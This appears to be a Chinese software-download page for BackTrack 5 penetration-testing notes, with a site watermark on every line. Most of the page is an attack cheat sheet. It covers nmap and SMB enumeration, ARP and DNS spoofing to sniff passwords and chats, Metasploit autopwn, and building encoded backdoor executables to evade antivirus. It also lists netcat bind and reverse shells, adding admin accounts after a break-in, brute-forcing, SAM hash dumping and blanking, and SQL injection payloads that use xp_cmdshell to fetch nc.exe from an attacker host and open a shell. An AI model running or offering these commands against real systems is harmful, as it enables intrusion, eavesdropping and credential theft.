BackTrack渗透测试笔记

BackTrack渗透测试笔记是一款BT5学习笔记，使用BT5的同学可以看看，不仅仅是用来破解WIFI，BT5还有更强大的功能。 体积小，但功能强大。界面非常清爽，简单易操作。iSU红软基地

软件功能

0x01.1 PTES 标准中的渗透测试阶段iSU红软基地
0x01.1.1 前期交互阶段iSU红软基地
0x01.1.2 情报搜集阶段iSU红软基地
0x01.1.3 威胁建模阶段iSU红软基地
0x01.1.4 漏洞分析阶段iSU红软基地
0x01.1.5 渗透攻击阶段iSU红软基地
0x01.1.6 后渗透攻击阶段iSU红软基地
0x01.1.7 报告阶段iSU红软基地
0x01.2 渗透测试类型iSU红软基地
0x01.2.1 白盒测试iSU红软基地
0x01.2.2 黑盒测试iSU红软基地
0x01.3 小结iSU红软基地
0x02 渗透环境搭建iSU红软基地
>iSU红软基地
0x03 常用信息收集iSU红软基地
0x03.1 被动信息收集iSU红软基地
0x03.2 主动信息收集iSU红软基地
0x03.3 针对性扫描iSU红软基地
0x03.4 小结iSU红软基地
0x04 信息收集的附属工作iSU红软基地
0x04.1 基本的漏洞扫描iSU红软基地
0x04.2 使用 Nessus 进行扫描iSU红软基地
0x04.3 专用漏洞扫描器iSU红软基地
0x05 社会工程学攻击iSU红软基地
0x05.1 针对性的钓鱼攻击iSU红软基地
0x05.2 web 向量攻击iSU红软基地
0x05.3 SET 的其他特性iSU红软基地
0x05.4 小结。iSU红软基地

软件说明

ping 域名/ip 测试本机到远端主机是否联通。iSU红软基地
dig 域名/ip 查看域名解析的详细信息。iSU红软基地
host -l 域名 dns服务器 传输zone。iSU红软基地
扫描iSU红软基地
nmap:iSU红软基地
-sS 半开扫描TCP和SYN扫描。iSU红软基地
-sT 完全TCP连接扫描。iSU红软基地
-sU UDP扫描iSU红软基地
-PS syn包探测(防火墙探测)iSU红软基地
-PA ack包探测(防火墙探测)iSU红软基地
-PN 不ping。iSU红软基地
-n 不dns解析。iSU红软基地
-A -O和-sV。iSU红软基地
-O 操作系统识别。iSU红软基地
-sV 服务版本信息(banner)iSU红软基地
-p 端口扫描。iSU红软基地
-T 设置时间级别(0-5)iSU红软基地
-iL 导入扫描结果。iSU红软基地
-oG 输出扫描结果。iSU红软基地
操作系统识别:iSU红软基地
p0f -i eth0 -U -p 开启混杂模式。iSU红软基地
xprobe2 ip|域名 检测os。iSU红软基地
banner获取:iSU红软基地
nc ip port 检测端口是否打开。iSU红软基地
telnet ip port 检测端口是否打开。iSU红软基地
wget ip 下载主页。iSU红软基地
cat index.html | more 显示主页代码。iSU红软基地
q 退出。iSU红软基地
windows枚举iSU红软基地
nmap -sS -p 139，445 ip 扫描windows。iSU红软基地
cd /pentest/enumeration/smb-enumiSU红软基地
nbtscan -f targetIP 检测netbios。iSU红软基地
smbgetserverinfo -i targetIP 扫描name，os，组。iSU红软基地
smbdumpusers -i targetIP 列出用户。iSU红软基地
smbclient -L //targetIP 列出共享。iSU红软基地
使用windows:iSU红软基地
net use \\ip\ipc$ "" /u:"" 开启空会话。iSU红软基地
net view \\ip 显示共享信息。iSU红软基地
smbclient:iSU红软基地
smbclient -L hostName -I targetIP 枚举共享。iSU红软基地
smbclient -L hostName/share -U "" 用空用户连接。iSU红软基地
smbclient -L hostName -I targetIP -U admin普通用户连接。iSU红软基地
rpcclient:iSU红软基地
rpcclient targetIP -U ""打开一个空会话。iSU红软基地
netshareenum 枚举共享。iSU红软基地
enumdomusers 枚举用户。iSU红软基地
lsaenumsid 枚举域SID。iSU红软基地
queryuser RID 查询用户信息。iSU红软基地
createdomuser 创建用户访问。iSU红软基地
ARP欺骗:iSU红软基地
ettercap:iSU红软基地
nano /usr/local/etc/etter.conf配置文件iSU红软基地
Sniff > Unified sniffing > Network interface: eth0 > OK 设置抓包的网卡iSU红软基地
Hosts > Scan for hosts (do this two times)扫描网段的主机iSU红软基地
Hosts > Hosts list 显示主机列表iSU红软基地
Select the default gateway > Add to Target 1 添加主机iSU红软基地
Select the target > Add to Target 2 添加主机iSU红软基地
Mitm > Arp poisoning > Sniff remote connections > OK 设置ARP攻击iSU红软基地
Start > Start sniffing 开始攻击iSU红软基地
dsniff -i eth0 监听网卡窃听登录用户密码iSU红软基地
urlsnarf -i eth0 嗅探http请求iSU红软基地
msgsnarf -i eth0 嗅探聊天软件的聊天内容iSU红软基地
driftnet -i eth0 网络管理嗅探图片，音频。iSU红软基地
dns欺骗:iSU红软基地
nano /usr/local/share/ettercap/etter.dns编辑配置文件iSU红软基地
Plugins > Manage the plugins > dns_spoof 设置dns欺骗iSU红软基地
Mitm > Arp poisoning > Sniff remote connections > OK 设置ARPiSU红软基地
Start > Start sniffing 开始攻击iSU红软基地
Exploits漏洞利用:iSU红软基地
cd /pentest/exploits/exploit-db 进入目录iSU红软基地
cat sploitlist.txt | grep -i [exploit] 查询需要的漏洞iSU红软基地
cat exploit | grep "#include"检查运行环境iSU红软基地
cat sploitlist.txt | grep -i exploit | cut -d " " -f1 | xargs grep sys | cut -d ":" -f1 | sort -u只保留可以在linux下运行的代码iSU红软基地
Metasploit:iSU红软基地
svn update 升级iSU红软基地
./msfweb Web接口127.0.0.1:55555。.iSU红软基地
./msfconsole 字符下的Console。iSU红软基地
help 帮助iSU红软基地
show <option> 显示选项iSU红软基地
search <name> 搜索名字iSU红软基地
use <exploit name> 使用漏洞iSU红软基地
show options 显示选项iSU红软基地
set <OPTION NAME> <option> 设置选项iSU红软基地
show payloads 显示装置iSU红软基地
set PAYLOAD <payload name> 设置装置iSU红软基地
show options 显示选项iSU红软基地
set <OPTION NAME> <option> 设置选项iSU红软基地
show targets 显示目标(os版本)iSU红软基地
set TARGET <target number> 设置目标版本iSU红软基地
exploit 开始漏洞攻击iSU红软基地
sessions -l 列出会话iSU红软基地
sessions -i <ID> 选择会话iSU红软基地
sessions -k <ID> 结束会话iSU红软基地
<ctrl> z 把会话放到后台iSU红软基地
<ctrl> c 结束会话iSU红软基地
jobs 列出漏洞运行工作iSU红软基地
jobs -K 结束一个漏洞运行工作iSU红软基地
show auxiliary 显示辅助模块iSU红软基地
use <auxiliary name> 使用辅助模块iSU红软基地
set <OPTION NAME> <option> 设置选项iSU红软基地
run 运行模块iSU红软基地
scanner/smb/version 扫描系统版本iSU红软基地
scanner/mssql/mssql_ping 测试mssql是否在线iSU红软基地
scanner/mssql/mssql_login 测试登录(暴力或字典)iSU红软基地
Attacker behind firewall: bind shell正向iSU红软基地
Target behind firewall: reverse shell反向iSU红软基地
Meterpreter衔接不懂dos的可以用这个:iSU红软基地
db_import_nessus_nbe 加载nessus的扫描结果iSU红软基地
db_import_nmap_xml 加载nmap的扫描结果iSU红软基地
自动化攻击流程:iSU红软基地
cd /pentest/exploit/framework3iSU红软基地
./msfconsoleiSU红软基地
load db_sqlite3iSU红软基地
db_destroy pentestiSU红软基地
db_create pentestiSU红软基地
db_nmap targetIPiSU红软基地
db_hostsiSU红软基地
db_servicesiSU红软基地
db_autopwn -t -p -eiSU红软基地
字符接口攻击流程:iSU红软基地
./msfcli | grep -i <name>iSU红软基地
./msfcli <exploit or auxiliary> SiSU红软基地
./msfcli <exploit name> <OPTION NAME>=<option> PAYLOAD=<payload name> EiSU红软基地
做木马后门等:iSU红软基地
./msfpayload <payload> <variable=value> <output type>iSU红软基地
S summary and options of payloadiSU红软基地
C C languageiSU红软基地
P PerliSU红软基地
y RubyiSU红软基地
R Raw， allows payload to be piped into msfencode and other toolsiSU红软基地
J JavaScriptiSU红软基地
X Windows executableiSU红软基地
./msfpayload windows/shell/reverse_tcp LHOST=10.1.1.1 CiSU红软基地
./msfpayload windows/meterpreter/reverse_tcp LHOST=10.1.1.1 LPORT=4444 X > evil.exeiSU红软基地
编码处理就是做免杀:iSU红软基地
./msfencode <options> <variable=value>iSU红软基地
./msfpayload linux_ia32_bind LPORT=4444 R | ./msfencode -b '\x00′ -liSU红软基地
./msfpayload linux_ia32_bind LPORT=4444 R | ./msfencode -b '\x00′ -e PexFnstenvMor -t ciSU红软基地
入侵后在windows下添加管理员用户:iSU红软基地
hostname 查看主机名iSU红软基地
net users 查看用户iSU红软基地
net user 用户 密码 /add 添加用户iSU红软基地
net localgroup 查看工作组iSU红软基地
net localgroup administrators 查看管理员组iSU红软基地
net localgroup administrators x /add 将用户加入管理员组iSU红软基地
TFTPiSU红软基地
cp /pentest/windows-binaries/tools/nc.exe /tmp/传递到tftp上iSU红软基地
tftp -i 10.1.1.2 GET nc.exe下载iSU红软基地
netcat瑞士军刀iSU红软基地
attacker: 10.1.1.1iSU红软基地
target: 10.1.1.2iSU红软基地
nc -v -z 10.1.1.2 1-1024 端口扫描iSU红软基地
target: nc -lvp 4444 聊天设置(服务)iSU红软基地
attacker: nc -v 10.1.1.2 4444 聊天设置(客户)iSU红软基地
target: nc -lvp 4444 > output.txt传输文件(接受)iSU红软基地
attacker: nc -v 10.1.1.2 4444 < test.txt传输文件(发送)iSU红软基地
target: nc -lvp 4444 -e cmd.exe Bind shell。iSU红软基地
attacker: nc -v 10.1.1.2 4444iSU红软基地
target:nc -lvp 4444 Reverse shell。iSU红软基地
attacker:nc -v 10.1.1.2 4444 -e /bin/bashiSU红软基地
密码iSU红软基地
字典zcat /pentest/password/dictionaries/wordlist.txt.Z > wordsiSU红软基地
cat words | wc -l显示个数(30多万个)iSU红软基地
暴力:iSU红软基地
hydra -l ftp -P words -v targetIP ftp 攻击ftp。iSU红软基地
hydra -l muts -P words -v targetIP pop3 攻击pop3iSU红软基地
hydra -P words -v targetIP snmp 攻击snmpiSU红软基地
攻击microsof VPNiSU红软基地
nmap -p 1723 targetIPiSU红软基地
dos2unix wordsiSU红软基地
cat words | thc-pptp-bruter targetIPiSU红软基地
WYD:iSU红软基地
wget -r target.com –accept=pdf 下载pdf文档iSU红软基地
wyd.pl -o output.txt .target.com/iSU红软基地
cat output.txt | moreiSU红软基地
SAM文件(windows下的密码文件):iSU红软基地
%SYSTEMROOT%/system32/configiSU红软基地
%SYSTEMROOT%/repairiSU红软基地
备份windows的hash文件:iSU红软基地
./msfcli exploit/windows/dcerpc/ms03_026_dcom RHOST=targetIP PAYLOAD=windows/meterpreter/bind_tcp EiSU红软基地
meterpreter > upload -r /tmp/pwdump6 c:\\windows\\system32\\iSU红软基地
meterpreter > execute -f cmd -ciSU红软基地
meterpreter > interact xiSU红软基地
C:\WINDOWS\system32> pwdump \\127.0.0.1iSU红软基地
john破解密码:iSU红软基地
cp hash.txt /pentest/password/john-1.7.2/run/iSU红软基地
cd /pentest/password/john-1.7.2/run/iSU红软基地
./john hash.txtiSU红软基地
彩虹表:iSU红软基地
rcrack *.rt -f hash.txtiSU红软基地
本地修改密码:iSU红软基地
mountiSU红软基地
umount /mnt/hda1iSU红软基地
modprobe fuseiSU红软基地
ntfsmount /dev/hda1 /mnt/hda1iSU红软基地
mountiSU红软基地
ls -l /mnt/hda1 挂载c盘iSU红软基地
bkhive /mnt/sda1/WINDOWS/system32/config/system system.txtiSU红软基地
samdump2 /mnt/sda1/WINDOWS/system32/config/sam system.txt > hash.txt 备份sam文件iSU红软基地
直接修改sam文件:iSU红软基地
chntpw /mnt/sda1/WINDOWS/system32/config/SAMiSU红软基地
Blank the password. *iSU红软基地
Do you really wish to change it? yiSU红软基地
Write hive files? yiSU红软基地
unmount /mnt/sda1iSU红软基地
rebootiSU红软基地
SQL 注入iSU红软基地
nmap -sS -p 1521 targetIP 扫描oracleiSU红软基地
nmap -sS -p T:1433，U:1434 targetIP 扫描mssqliSU红软基地
' or 1=1–验证旁路iSU红软基地
列举表名:iSU红软基地
' having 1=1–iSU红软基地
' group by table having 1=1–iSU红软基地
' group by table， table2 having 1=1–iSU红软基地
' group by table， table2， table3 having 1=1–iSU红软基地
列举列类型:iSU红软基地
union select sum(column) from table –iSU红软基地
union select sum(column2) from table –iSU红软基地
添加数据:iSU红软基地
' ; insert into table values('value'，'value2′，'value3′)–iSU红软基地
MSSQL存储程序:iSU红软基地
输出数据库中备案信息到一个html文件，您可以查看与一个浏览器。iSU红软基地
' ; exec sp_makewebtask "c:\Inetpub\wwwroot\test.html"， "select * from table" ; —.target.com/test.htmliSU红软基地
运行ipconfig在浏览器查看信息。iSU红软基地
' or 1=1; exec master..xp_cmdshell ' "ipconfig" > c:\Inetpub\wwwroot\test.txt' .target.com/test.txtiSU红软基地
上传后门。iSU红软基地
' or 1=1; exec master..xp_cmdshell ' "tftp -i attackIP GET nc.exe && nc.exe attackIP 53 -e cmd.exe' ; –iSU红软基地
攻击者: nc -lvp 53iSU红软基地
spreadfold。iSU红软基地

相关介绍

bt5，全称Back Track five，是继bt3，bt4之后的最新版。这是一个linux环境的便携系统，可以放到U盘或者硬盘中启动，对本身硬盘没有影响，无需在本地安装。内置大量的网络安全检测工具以及黑客破解软件等。iSU红软基地

软件截图

iSU红软基地